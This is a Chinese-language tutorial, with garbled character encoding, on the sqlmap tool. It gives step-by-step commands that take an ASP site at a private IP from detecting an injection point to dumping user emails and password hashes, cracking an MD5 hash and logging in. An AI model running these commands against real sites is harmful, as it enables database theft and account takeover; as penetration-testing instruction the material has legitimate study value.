溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

滲透測(cè)試工具sqlmap怎么用

發(fā)布時(shí)間:2022-01-15 09:45:37 來(lái)源:億速云 閱讀:149 作者:小新 欄目:數(shù)據(jù)庫(kù)

這篇文章主要介紹滲透測(cè)試工具sqlmap怎么用,文中介紹的非常詳細(xì),具有一定的參考價(jià)值,感興趣的小伙伴們一定要看完!

一、檢測(cè)注入點(diǎn)是否可用

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

參數(shù):

-u:指定注入點(diǎn)url

滲透測(cè)試工具sqlmap怎么用

滲透測(cè)試工具sqlmap怎么用

注入結(jié)果展示:

(1)注入?yún)?shù)id為GET注入,注入類型有四種分別為:boolean-based blind、error-based、stacked queries、inline query。

(2)web服務(wù)器系統(tǒng)為windows 2003 or XP

(3)web應(yīng)用程序技術(shù)為:ASP.NET, Microsoft IIS 6.0

(4)數(shù)據(jù)庫(kù)類型為:SQLSERVER 2000

其中圖一有若干詢問(wèn)語(yǔ)句,需要用戶輸入[Y/N],如果你懶得輸入或者不懂怎么輸入可以讓程序自動(dòng)輸入,只需添加一個(gè)參數(shù)即可,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch

二、暴庫(kù)

一條命令即可曝出該sqlserver中所有數(shù)據(jù)庫(kù)名稱,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs


參數(shù):

--dbs:dbs前面有兩條杠,請(qǐng)看清楚。

滲透測(cè)試工具sqlmap怎么用

結(jié)果顯示該sqlserver中共包含7個(gè)可用的數(shù)據(jù)庫(kù)。

三、web當(dāng)前使用的數(shù)據(jù)庫(kù)

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db

滲透測(cè)試工具sqlmap怎么用

四、web數(shù)據(jù)庫(kù)使用賬戶

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user


滲透測(cè)試工具sqlmap怎么用

五、列出sqlserver所有用戶

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users

滲透測(cè)試工具sqlmap怎么用

六、數(shù)據(jù)庫(kù)賬戶與密碼

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords

滲透測(cè)試工具sqlmap怎么用

七、列出數(shù)據(jù)庫(kù)中的表

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables

參數(shù):

-D:指定數(shù)據(jù)庫(kù)名稱

--tables:列出表

滲透測(cè)試工具sqlmap怎么用

結(jié)果體現(xiàn)共列出了34張表。

八、列出表中字段

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns


參數(shù):

-D:指定數(shù)據(jù)庫(kù)名稱

-T:指定要列出字段的表

--columns:指定列出字段

滲透測(cè)試工具sqlmap怎么用

結(jié)果顯示該userb表中包含了23條字段。

九、暴字段內(nèi)容

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump

參數(shù):

-C :指定要暴的字段

--dump:將結(jié)果導(dǎo)出

滲透測(cè)試工具sqlmap怎么用

如果字段內(nèi)容太多,需要花費(fèi)很多時(shí)間。可以指定導(dǎo)出特定范圍的字段內(nèi)容,命令如下:

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump

參數(shù):

--start:指定開(kāi)始的行

--stop:指定結(jié)束的行

此條命令的含義為:導(dǎo)出數(shù)據(jù)庫(kù)tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容。

滲透測(cè)試工具sqlmap怎么用

十、驗(yàn)證結(jié)果

通過(guò)上圖結(jié)果看到其中的一個(gè)用戶信息為:

email:123456@qq.com

username: 1.asp

password: 49ba59abbe56e057

通過(guò)md5解密,得到該hash的原文密碼為:123456

拿到賬號(hào)密碼我們來(lái)測(cè)試是否可以登錄

滲透測(cè)試工具sqlmap怎么用

驗(yàn)證成功!

以上是“滲透測(cè)試工具sqlmap怎么用”這篇文章的所有內(nèi)容,感謝各位的閱讀!希望分享的內(nèi)容對(duì)大家有幫助,更多相關(guān)知識(shí),歡迎關(guān)注億速云行業(yè)資訊頻道!

向AI問(wèn)一下細(xì)節(jié)
推薦閱讀:
  1. SQLMap入門
  2. sqlmap命令

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI